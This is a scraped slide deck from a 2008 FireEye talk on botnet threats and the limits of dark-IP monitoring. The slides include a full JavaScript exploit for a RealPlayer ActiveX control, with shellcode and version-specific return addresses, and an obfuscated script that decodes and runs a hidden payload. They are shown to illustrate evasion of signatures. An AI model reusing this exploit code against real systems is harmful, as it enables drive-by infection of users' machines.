180 likes | 328 Views
Lit Space Monitoring for Botnets. Stuart Staniford Chief Scientist 1/21/2008. Botnets = Targeted Infection + Remote Control Payload. Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities
E N D
Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008
Botnets = Targeted Infection + Remote Control Payload • Botnet -a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities • Remote control payload enables further malicious payload installs • Malicious payloads enable monetization via: • Spam relay (leased to spammers) • DDoS (extortion business model) • ID Theft (consumer, business, or gov’t) • Intellectual property theft • Phishing site hosting • Click fraud • Online financial services fraud • E-commerce site fraud
Botnets Are A Critical Threat Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches. Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007 Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets - Vint Cerf Botnets: A Global Pandemic 3
Growing Wave of Concern Cyber-terrorism High Government Cyber warfare Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance Risks Productivity Loss Brand Damage Resource Inefficiency Enterprise Magnitude of Threat Service Provider Mass-scale DDoS Mass-scale SPAM Click fraud Identity Theft Phishing Pharming DDoS SPAM Spyware platform Steal resources Consumer Low Nuisance Late 1990’s - 2002 Concern 2003 - 2006 Danger 2007 - Beyond Botnet Attack Evolution
Traditional Botnet (first half 2000s) Command & Control via IRC Grow by active scanning
Still a lot of that about Portion of a botnet tracked by FireEye botwall network
Monitoring Traditional Botnets Dark IP Space/Network Telescope Wait for bot to scan, and try to capture
Tradeoffs of Dark IP Monitoring Advantages Fidelity - if something scans dark IP, is likely bad Cheap/easy - can cover a lot of IP space that wasn’t being used Especially internally to enterprises Disadvantages Some bots avoid the dark-IP space - scan selectively Persuading the bot to talk can be tricky Need deep interaction honeypot to do it right Bots moving away from scanning as a technique Bot-owners can learn Dark Ips if feedback (eg to signatures)
Directions in Botnet Technology Technology evolution is rapid Well funded industry Smart technologists Disciplined execution of attacks and management of resources/business Gives various trends that render current defensive technologies obsolete Exploits via web/email (bypass firewall) Obfuscation and polymorphism (bypass AV/IPS) Distributed command-and-control, and high turnover of assets, renders trackdown and clean-up hard DNS tracking hard Web crawling behind the curve
Exploits via web if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvkKNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NXKjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnXzmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSNzT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWinInPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZodKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZoWsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInOoDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vvYiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQelhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJQspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsqmk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLNktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
More obfuscated example <script language=JavaScript>function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pRMVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgjvo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDsUEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWWFdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpTmWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oIQ9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumTfvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumTHumTaumTHZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumTHumwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@QvEdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFtku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2@QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")</script> Variables and encoding can be polymorphic - not much for signatures to go on
Preliminary Expt on open network (Dec) ~ 5000 users ~ 3 hrs of intermittent data Parsed HTTP and entities ~ 200,000 HTTP containing flows Google safe browsing API alerted on ~700 of them Manually verified - only 11 checked out Daily rate is ~100 incidents/day Don’t know how many were successful at this point Not sure how typical this period is so only order of magnitude estimate Google safe browsing API is 99%+ false positives Reasons not well understood yet Gearing up for another experimental run Hopefully LEET 08 paper
Distributed Command and Control - Storm eDonkey UDP messages in Peer-to-Peer command and control Grow by spam/malicious downloads - been running for 12 months now in plain sight No scanning! 115,000 seen from a single .edu
Dynamic Infrastructure - Fast Flux Small Number of Persistent Content Servers Large Number of Dynamic Proxies DNS Servers
Rendering Current Approaches Obsolete Antivirus Bypass by not matching AV signatures Network Behavior Analysis Bypass by low & slow spread GAP Need security solution that scales with exponential nature of threat IDS/IPS Bypass by not matching signatures & using other infection vectors Dark IP Honeypots Bypass by not targeting dark IP addresses and honeypots FireEye, Inc. Confidential
Lit Space Monitoring FireEye, Inc. Confidential
Global Deployment Local Analysis & Protection Global Analysis & Intelligence Distribution FireEye, Inc. Confidential 17
Thank you! Q & A FireEye, Inc. Confidential